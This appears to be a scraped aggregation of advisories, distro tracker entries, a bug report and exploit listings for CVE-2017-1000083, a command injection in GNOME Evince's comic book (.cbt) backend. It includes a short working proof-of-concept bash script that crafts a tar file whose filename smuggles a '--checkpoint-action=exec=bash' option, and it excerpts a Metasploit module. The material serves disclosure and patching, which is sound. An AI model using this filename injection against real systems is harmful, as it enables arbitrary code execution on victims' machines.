CVE-2017-1000083: backend/comics/comics-document.c (aka the comic book backend) in GNOME Evince before 3.24.1 allows remote attackers to execute arbitrary commands via a .cbt…

CVE-2017-1000083 Evince vulnerability Title: Evince vulnerability Summary: Evince could be made run programs as your login if it opened a specially crafted file. Felix Wilhelm discovered that Evince did not safely invoke tar when handling tar comic book (cbt) files. An attacker could use this to construct a malicious cbt comic book format file that, when opened in Evince, executes arbitrary code. Please note that this update disables support for cbt files in Evince. Instructions: In general, a standard system update will make all the necessary changes.

CVE-2017-1000083 [HIGH] CWE-78 evince: command injection via filename in tar-compressed comics archive evince: command injection via filename in tar-compressed comics archive backend/comics/comics-document.c (aka the comic book backend) in GNOME Evince before 3.24.1 allows remote attackers to execute arbitrary commands via a .cbt file that is a TAR archive containing a filename beginning with a "--" command-line option substring, as demonstrated by a --checkpoint-action=exec=bash at the beginning of the filename. It was found that evince did not properly sanitize the command line which is run to untar Comic Book Tar (CBT) files, thereby allowing command injection. A specially crafted CBT file, when opened by evince or evince-thumbnailer, could execute arbitrary commands in the context of the evince program. Mitigation: - Disabling evince-thumbnailer to render icons will reduce the attack

CVE-2017-1000083 [HIGH] CVE-2017-1000083: atril - backend/comics/comics-document.c (aka the comic book backend) in GNOME Evince be... backend/comics/comics-document.c (aka the comic book backend) in GNOME Evince before 3.24.1 allows remote attackers to execute arbitrary commands via a .cbt file that is a TAR archive containing a filename beginning with a "--" command-line option substring, as demonstrated by a --checkpoint-action=exec=bash at the beginning of the filename. Scope: local bookworm: resolved (fixed in 1.16.1-2.1) bullseye: resolved (fixed in 1.16.1-2.1) forky: resolved (fixed in 1.16.1-2.1) sid: resolved (fixed in 1.16.1-2.1) trixie: resolved (fixed in 1.16.1-2.1)

CVE-2017-1000083 [HIGH] GHSA-c796-cmwx-5c79: backend/comics/comics-document backend/comics/comics-document.c (aka the comic book backend) in GNOME Evince before 3.24.1 allows remote attackers to execute arbitrary commands via a .cbt file that is a TAR archive containing a filename beginning with a "--" command-line option substring, as demonstrated by a --checkpoint-action=exec=bash at the beginning of the filename.

CVE-2017-1000083 [HIGH] CVE-2017-1000083: backend/comics/comics-document backend/comics/comics-document.c (aka the comic book backend) in GNOME Evince before 3.24.1 allows remote attackers to execute arbitrary commands via a .cbt file that is a TAR archive containing a filename beginning with a "--" command-line option substring, as demonstrated by a --checkpoint-action=exec=bash at the beginning of the filename.

CVE-2017-1000083 Evince - CBT File Command Injection (Metasploit) Evince - CBT File Command Injection (Metasploit) --- ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'rex/zip' class MetasploitModule 'Evince CBT File Command Injection', 'Description' => %q{ This module exploits a command injection vulnerability in Evince before version 3.24.1 when opening comic book `.cbt` files. Some file manager software, such as Nautilus and Atril, may allow automatic exploitation without user interaction due to thumbnailer preview functionality. Note that limited space is available for the payload ( MSF_LICENSE, 'Author' => [ 'Felix Wilhelm', # Discovery 'Sebastian Krahmer', # PoC 'Matlink', # Exploit 'bcoles' # Metasploit ], 'References' => [ ['BID', '99597'], ['C

CVE-2017-1000083 [HIGH] Evince 3.24.0 - Command Injection Evince 3.24.0 - Command Injection --- # Exploit Title: evince command line injection # Date: 2017-09-05 # Exploit Author: Matlink # Vendor Homepage: https://wiki.gnome.org/Apps/Evince # Software Link: https://wiki.gnome.org/Apps/Evince # Version: 3.24.0 # Tested on: Debian sid # CVE : CVE-2017-1000083 Can be tested on docker with https://github.com/matlink/evince-cve-2017-1000083 #! /bin/bash # define the payload export PAYLOAD="firefox google.com" # Create the malicious .cbt file dd if=/dev/zero of=" --checkpoint-action=exec=bash -c '$PAYLOAD;'.jpg" bs=1 count=512000 tar cvf poc.cbt *.jpg # Run the malicious file evince poc.cbt

Evince CBT File Command Injection Evince CBT File Command Injection This module exploits a command injection vulnerability in Evince before version 3.24.1 when opening comic book `.cbt` files. Some file manager software, such as Nautilus and Atril, may allow automatic exploitation without user interaction due to thumbnailer preview functionality. Note that limited space is available for the payload (<256 bytes). Reverse Bash and Reverse Netcat payloads should be sufficiently small. This module has been tested successfully on evince versions: 3.4.0-3.1 + nautilus 3.4.2-1+build1 on Kali 1.0.6; 3.18.2-1ubuntu4.3 + atril 1.12.2-1ubuntu0.3 on Ubuntu 16.04.

CVE-2017-1000083 [HIGH] CVE-2017-1000083 evince: command injection via filename in tar-compressed comics archive [fedora-all] CVE-2017-1000083 evince: command injection via filename in tar-compressed comics archive [fedora-all] Use the following template to for the 'fedpkg update' request to submit an update for this issue as it contains the top-level parent bug(s) as well as this tracking bug. This will ensure that all associated bugs get updated when new packages are pushed to stable. # bugfix, security, enhancement, newpackage (required) type=security # testing, stable request=testing # Bug numbers: 1234,9876 bugs=1468488 # Description of your update notes=Security fix for [PUT CVEs HERE] # Enable request automation based on the stable/unstable karma thresholds autokarma=True stable_karma=3 unstable_karma=-3 # Automatically close bugs when this marked as stable close_bugs=True # Suggest that users res

CVE-2017-1000083 [HIGH] CVE-2017-1000083 evince: command injection via filename in tar-compressed comics archive CVE-2017-1000083 evince: command injection via filename in tar-compressed comics archive Created attachment 1295228 0001-comics-Remove-support-for-tar-and-tar-like-commands.patch From the folks at Project Zero: """ Hi, The comic book backend in evince 3.24.0 is vulnerable to a command injection bug that can be used to execute arbitrary commands when a cbt file is opened: cbt files are simple tar archives containing images. When a cbt file is processed, evince calls "tar -xOf $archive $filename" for every image file in the archive: // backend/comics/comics-document.c: 914 command_line = g_strdup_printf ("%s %s %s", comics_document->extract_command, quoted_archive, quoted_filename); While both the archive name and the filename are quoted to not be interpreted by the shell, the filenam